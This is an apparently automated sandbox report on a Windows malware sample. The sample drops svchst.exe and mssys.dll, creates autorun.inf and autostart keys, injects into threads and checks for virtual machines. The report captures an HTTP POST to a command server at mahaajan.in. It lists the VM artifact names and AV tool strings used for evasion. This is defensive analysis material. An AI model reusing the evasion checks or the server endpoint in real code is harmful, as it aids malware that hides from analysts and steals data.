General Information

Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Success Statistics:
  • POIButNoSDmp: 0
  • BadPOI: 6
  • TotalInputPOI: 312
  • UnresolvedImplicitCalls: 188
  • ResolvedImplicitCalls: 242
  • NoCallBeforePOI: 0
  • POIImplicitCalls: 167
  • POIFound: 306
  • AllImplicitCalls: 597
Warnings:
  • Too many NtQueryDirectoryFile calls (excessive behavior)
  • Too many NtProtectVirtualMemory calls (excessive behavior)

Classification / Threat Score

Persistence, Installation, Boot Survival :
Hiding, Stealthiness, Detection and Removal Protection :
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection :
Spreading :
Exploiting :
Networking :
Data spying, Sniffing, Keylogging, Ebanking Fraud :

Matching Signatures

Behavior Signatures
Creates files inside the user directory
Queries a list of all running processes
Spawns processes
Urls found in memory or binary data
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Binary may include packed or crypted data
Checks if the current process is being debugged
Creates an autostart registry key
Creates files inside the system directory
Creates mutexes \BaseNamedObjects\Local\c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5! \BaseNamedObjects\Local\c:!documents and settings!networkservice!cookies! \BaseNamedObjects\Local\c:!documents and settings!networkservice!local settings!history!history.ie5!
Drops PE files
Enumerates the file system
Found strings which match to known social media urls
May have tried to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
PE sections with suspicious entropy found
Performs DNS lookups
Posts data to webserver
Contains capabilities to detect virtual machines
Creates autorun.inf (USB autostart)
Modifies the context of a thread in another process (thread injection)
Shows file infector / information gathering behavior (enumerates multiple directories for files)

Code Signatures
Contains functionality to download additional files from the internet
Contains functionality to enumerate / list files inside a directory
Contains functionality to query local / system time
Contains functionality to start windows services
Contains functionality to dynamically determine API calls

Startup

  • svchst.exe (PID: 1508 MD5: 6B16C4526A013E744B3D91CD7A091C36)
    • svchst.exe (PID: 1616 MD5: 6B16C4526A013E744B3D91CD7A091C36)

Created / dropped Files

File Path MD5
C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf E94FCAB2699C22CF69387EA0EE892968
C:\WINDOWS\mssys.dll 879631FB71EEF07DB32A97E8DAD372EA
C:\WINDOWS\svchst.exe 6B16C4526A013E744B3D91CD7A091C36
C:\autorun.inf 22E7E2047F46662384F91EAC7EFCC806
\ROUTER DF3F6F25E4716A933F765B3AE24BC869
\net\NtControlPipe20 5DBF9AB5CA0D05D4E1865D918572E54B

Contacted Domains

No contacted domain info

Contacted IPs

No contacted IP info

Static File Info

File type: Users\admin\Desktop\vm_tricks_sample; PE32 executable for MS Windows (GUI) Intel 80386 32-bit
File name: vm_tricks_sample
File size: 196608
MD5: 6b16c4526a013e744b3d91cd7a091c36
SHA1: 610e916e1f3c5c9faebdd539d9ff2d82a807e1e2
SHA256: f7e1cb9f307794648443497824a72af7c22a6fd77ad67698affc5979172750a2
SHA512: 2ece4f9afee77f8bdd9e6b37c95e5e51632d8628d8946b7e52f1518ca6397b757f89e2e21b153cb8c85eb854afca34cc871ef7f07a0c2ee194a6965c833d5274

Static PE Info

General
Entrypoint: 0x41611c
Entrypoint Section: .text
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x81C4B2F8 [Tue Dec 28 12:22:16 2038 UTC]
TLS Callbacks:
Resources
Name RVA Size Type Language Country
RT_RCDATA 0x1906c 0x12600 ump; data
Imports
DLL Import
ntdll.dll NtUnmapViewOfSection
WS2_32.dll WSAConnect, WSASocketA
WININET.dll InternetGetConnectedState
KERNEL32.dll HeapAlloc, CloseHandle, HeapFree, WriteFile, CreateFileA, SetFilePointer, GetProcessHeap, ExitProcess, GetCommandLineA, GetStartupInfoA, GetModuleHandleA, DeleteFileA
USER32.dll wvsprintfA
Sections
Name Virtual Address Virtual Size Raw Size Entropy
.text 0x1000 0x18000 0x18000 7.15986996647
.rsrc 0x19000 0x1266c 0x12800 7.85865882135
.reloc 0x2c000 0x5600 0x5400 2.2117994718

String Analysis

URLs
String value Source
http://grub.org) vm_tricks_sample.exe, svchst.exe
http://help.naver.com/delete_main.asp) vm_tricks_sample.exe, svchst.exe
http://mahaajan.in/dd/ svchst.exe, vm_tricks_sample, svchst.exe.dr
http://mahaajan.in/dd/diwar.php vm_tricks_sample.exe, svchst.exe
http://sp.ask.com/docs/about/tech_crawling.html) vm_tricks_sample.exe, svchst.exe
http://www.ba.be) vm_tricks_sample.exe, svchst.exe
http://www.changedetection.com/bot.html vm_tricks_sample.exe, svchst.exe
http://www.cnet.com/) vm_tricks_sample.exe, svchst.exe
http://www.google.com/bot.html) svchst.exe
http://www.net-promoter.com/) vm_tricks_sample.exe, svchst.exe
http://www.netnose.com) vm_tricks_sample.exe, svchst.exe
http://www.powerset.com) vm_tricks_sample.exe, svchst.exe
http://www.searchhippo.com/; vm_tricks_sample.exe, svchst.exe
http://www.wisenutbot.com) vm_tricks_sample.exe, svchst.exe
AV process names
String value Source
Autoruns.exe svchst.exe, svchst.exe.dr
Social media names
String value Source
Mozilla/4.0 (compatible; Yahoo Japan; for robot study; kasugiya) equals www.yahoo.com (Yahoo) vm_tricks_sample.exe, svchst.exe
VM Artifacts
String value Source
VBoxMouse svchst.exe.dr
xenvdb svchst.exe.dr
vmdebug svchst.exe.dr
VBoxService svchst.exe.dr
vpcbus svchst.exe.dr
vmicvss svchst.exe.dr
vpcuhub svchst.exe.dr
vmwaretray.exe svchst.exe.dr
vmware svchst.exe.dr
xennet6 svchst.exe.dr
vmusrvc.exe svchst.exe, vm_tricks_sample, svchst.exe.dr
VBOX__ svchst.exe, vm_tricks_sample, svchst.exe.dr
xensvc svchst.exe.dr
xenevtchn svchst.exe.dr
vmicexchange svchst.exe.dr
VMTools svchst.exe.dr
xennet svchst.exe.dr
VBoxSF svchst.exe.dr
vpc-s3 svchst.exe.dr
VMMEMCTL svchst.exe.dr
vmwareuser.exe svchst.exe.dr
VBoxGuest svchst.exe.dr
vmicshutdown svchst.exe.dr
Hyper-V svchst.exe, vm_tricks_sample, svchst.exe.dr
vmsrvc.exe svchst.exe.dr
vboxtray.exe svchst.exe, vm_tricks_sample, svchst.exe.dr
msvmmouf svchst.exe.dr
VirtualMachine svchst.exe, vm_tricks_sample, svchst.exe.dr
vmicheartbeat svchst.exe.dr
vmmouse svchst.exe.dr
vboxservice.exe svchst.exe.dr

Network Behavior

TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Okt 12, 2012 14:46:29.692397118 MESZ 1039 80 192.168.0.10 208.91.198.109
Okt 12, 2012 14:46:29.692428112 MESZ 80 1039 208.91.198.109 192.168.0.10
Okt 12, 2012 14:46:29.692787886 MESZ 1039 80 192.168.0.10 208.91.198.109
Okt 12, 2012 14:46:29.695838928 MESZ 1039 80 192.168.0.10 208.91.198.109
Okt 12, 2012 14:46:29.695852041 MESZ 80 1039 208.91.198.109 192.168.0.10
Okt 12, 2012 14:46:30.878057003 MESZ 80 1039 208.91.198.109 192.168.0.10
Okt 12, 2012 14:46:31.025012970 MESZ 1039 80 192.168.0.10 208.91.198.109
Okt 12, 2012 14:46:31.132304907 MESZ 80 1039 208.91.198.109 192.168.0.10
Okt 12, 2012 14:46:31.133229971 MESZ 1039 80 192.168.0.10 208.91.198.109
Okt 12, 2012 14:46:31.133299112 MESZ 80 1039 208.91.198.109 192.168.0.10
Okt 12, 2012 14:46:31.133637905 MESZ 1039 80 192.168.0.10 208.91.198.109
UDP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Okt 12, 2012 14:46:22.548973083 MESZ 61120 53 192.168.0.10 195.186.1.121
Okt 12, 2012 14:46:22.549093008 MESZ 53 61120 195.186.1.121 192.168.0.10
Okt 12, 2012 14:46:22.549518108 MESZ 61120 53 192.168.0.10 195.186.4.121
Okt 12, 2012 14:46:22.549561024 MESZ 53 61120 195.186.4.121 192.168.0.10
Okt 12, 2012 14:46:24.482346058 MESZ 51208 53 192.168.0.10 195.186.1.121
Okt 12, 2012 14:46:24.482446909 MESZ 53 51208 195.186.1.121 192.168.0.10
Okt 12, 2012 14:46:24.482691050 MESZ 51208 53 192.168.0.10 195.186.4.121
Okt 12, 2012 14:46:24.482727051 MESZ 53 51208 195.186.4.121 192.168.0.10
Okt 12, 2012 14:46:25.305315018 MESZ 56719 53 192.168.0.10 195.186.1.121
Okt 12, 2012 14:46:26.293629885 MESZ 56719 53 192.168.0.10 195.186.4.121
Okt 12, 2012 14:46:27.290111065 MESZ 56719 53 192.168.0.10 195.186.1.121
Okt 12, 2012 14:46:29.292324066 MESZ 56719 53 192.168.0.10 195.186.1.121
Okt 12, 2012 14:46:29.292573929 MESZ 56719 53 192.168.0.10 195.186.4.121
Okt 12, 2012 14:46:29.633065939 MESZ 53 56719 195.186.1.121 192.168.0.10
Okt 12, 2012 14:46:30.600799084 MESZ 53 56719 195.186.4.121 192.168.0.10
Okt 12, 2012 14:46:30.647813082 MESZ 53 56719 195.186.1.121 192.168.0.10
Okt 12, 2012 14:46:32.206891060 MESZ 53 56719 195.186.1.121 192.168.0.10
Okt 12, 2012 14:46:32.264456987 MESZ 53 56719 195.186.4.121 192.168.0.10
ICMP Packets
Timestamp Source IP Dest IP Checksum Code Type
Okt 12, 2012 14:46:30.601129055 MESZ 192.168.0.10 195.186.4.121 8629 (Port unreachable) Destination Unreachable
Okt 12, 2012 14:46:30.648020029 MESZ 192.168.0.10 195.186.1.121 8329 (Port unreachable) Destination Unreachable
Okt 12, 2012 14:46:32.207338095 MESZ 192.168.0.10 195.186.1.121 8329 (Port unreachable) Destination Unreachable
Okt 12, 2012 14:46:32.264925003 MESZ 192.168.0.10 195.186.4.121 8629 (Port unreachable) Destination Unreachable
DNS Queries
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Okt 12, 2012 14:46:22.548973083 MESZ 192.168.0.10 195.186.1.121 0x2cd5 Standard query (0) http://mahaajan.in/dd/ A (IP address) IN (0x0001)
Okt 12, 2012 14:46:22.549518108 MESZ 192.168.0.10 195.186.4.121 0x2cd5 Standard query (0) http://mahaajan.in/dd/ A (IP address) IN (0x0001)
Okt 12, 2012 14:46:24.482346058 MESZ 192.168.0.10 195.186.1.121 0x2c1b Standard query (0) http://mahaajan.in/dd/ A (IP address) IN (0x0001)
Okt 12, 2012 14:46:24.482691050 MESZ 192.168.0.10 195.186.4.121 0x2c1b Standard query (0) http://mahaajan.in/dd/ A (IP address) IN (0x0001)
Okt 12, 2012 14:46:25.305315018 MESZ 192.168.0.10 195.186.1.121 0xab84 Standard query (0) mahaajan.in A (IP address) IN (0x0001)
Okt 12, 2012 14:46:26.293629885 MESZ 192.168.0.10 195.186.4.121 0xab84 Standard query (0) mahaajan.in A (IP address) IN (0x0001)
Okt 12, 2012 14:46:27.290111065 MESZ 192.168.0.10 195.186.1.121 0xab84 Standard query (0) mahaajan.in A (IP address) IN (0x0001)
Okt 12, 2012 14:46:29.292324066 MESZ 192.168.0.10 195.186.1.121 0xab84 Standard query (0) mahaajan.in A (IP address) IN (0x0001)
Okt 12, 2012 14:46:29.292573929 MESZ 192.168.0.10 195.186.4.121 0xab84 Standard query (0) mahaajan.in A (IP address) IN (0x0001)
DNS Answers
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Okt 12, 2012 14:46:22.549093008 MESZ 195.186.1.121 192.168.0.10 0x2cd5 Server failure (2) http://mahaajan.in/dd/ none none A (IP address) IN (0x0001)
Okt 12, 2012 14:46:22.549561024 MESZ 195.186.4.121 192.168.0.10 0x2cd5 Server failure (2) http://mahaajan.in/dd/ none none A (IP address) IN (0x0001)
Okt 12, 2012 14:46:24.482446909 MESZ 195.186.1.121 192.168.0.10 0x2c1b Server failure (2) http://mahaajan.in/dd/ none none A (IP address) IN (0x0001)
Okt 12, 2012 14:46:24.482727051 MESZ 195.186.4.121 192.168.0.10 0x2c1b Server failure (2) http://mahaajan.in/dd/ none none A (IP address) IN (0x0001)
Okt 12, 2012 14:46:29.633065939 MESZ 195.186.1.121 192.168.0.10 0xab84 No error (0) mahaajan.in 208.91.198.109 A (IP address) IN (0x0001)
Okt 12, 2012 14:46:30.600799084 MESZ 195.186.4.121 192.168.0.10 0xab84 No error (0) mahaajan.in 208.91.198.109 A (IP address) IN (0x0001)
Okt 12, 2012 14:46:30.647813082 MESZ 195.186.1.121 192.168.0.10 0xab84 No error (0) mahaajan.in 208.91.198.109 A (IP address) IN (0x0001)
Okt 12, 2012 14:46:32.206891060 MESZ 195.186.1.121 192.168.0.10 0xab84 No error (0) mahaajan.in 208.91.198.109 A (IP address) IN (0x0001)
Okt 12, 2012 14:46:32.264456987 MESZ 195.186.4.121 192.168.0.10 0xab84 No error (0) mahaajan.in 208.91.198.109 A (IP address) IN (0x0001)
HTTP Request Dependency Graph
  • mahaajan.in
HTTP Packets
Timestamp Source Port Dest Port Source IP Dest IP Header Total Bytes Transferred (KB)
Okt 12, 2012 14:46:29.695838928 MESZ 1039 80 192.168.0.10 208.91.198.109 POST /dd/diwar.php HTTP/1.0
Host: mahaajan.in
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
1
Okt 12, 2012 14:46:30.878057003 MESZ 80 1039 208.91.198.109 192.168.0.10 HTTP/1.1 500 Internal Server Error
Date: Fri, 12 Oct 2012 12:46:30 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6
Content-Length: 688
Connection: close
Content-Type: text/html; charset=iso-8859-1
2

Code Manipulation Behavior

System Behavior

General
Start time: 09:39:49
Start date: 24/01/2012
Path: C:\vm_tricks_sample.exe
Wow64 process (32bit): false
Commandline: unknown
Imagebase: 0x400000
File size: 196608 bytes
MD5 hash: 6B16C4526A013E744B3D91CD7A091C36

File Activities

File Path Access Options Content overwritten Completion Count Source Address Symbol
y: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
x: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
w: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
v: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
u: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
t: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
s: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
r: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
q: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
p: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
o: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
n: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
m: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
l: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
k: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
j: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
i: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
h: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
g: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
f: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
e: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
File Path Access Attributes Options Completion Count Source Address Symbol
C:\WINDOWS\mssys.dll read attributes and synchronize and generic write system synchronous io non alert and non directory file success or wait 1 413FC0 CreateFileA
File Path Offset Length Value Completion Count Source Address Symbol
C:\WINDOWS\mssys.dll unknown 67072 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 40 00 c3 b2 21 6e 90 b2 21 6e 90 b2 21 6e 90 ac 73 ea 90 90 21 6e 90 ac 73 fb 90 a2 21 6e 90 ac 73 ed 90 df 21 6e 90 95 e7 15 90 b1 21 6e 90 b2 21 6f 90 d3 21 6e 90 ac 73 e7 90 b5 21 6e 90 ac 73 ff 90 b3 21 6e 90 52 69 63 68 b2 21 6e 90 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5d 34 88 4f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 00 01 00 00 10 00 00 00 b0 05 success or wait 1 414018 WriteFile
File Path Offset Length Completion Count Source Address Symbol
File Path Disposition File Mask Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data BothDirectoryInformation <.exe no such file 1 41410C FindFirstFileA
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp BothDirectoryInformation <.exe no such file 1 41410C FindFirstFileA
C:\WINDOWS\Web BothDirectoryInformation <.exe no such file 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\export\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\export\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\export\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\dump\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\dump\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\dump\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\logs\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\logs\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\logs\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\udf\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\udf\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\udf\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\shoots\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\shoots\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\shoots\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
\;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\ BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Identities BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
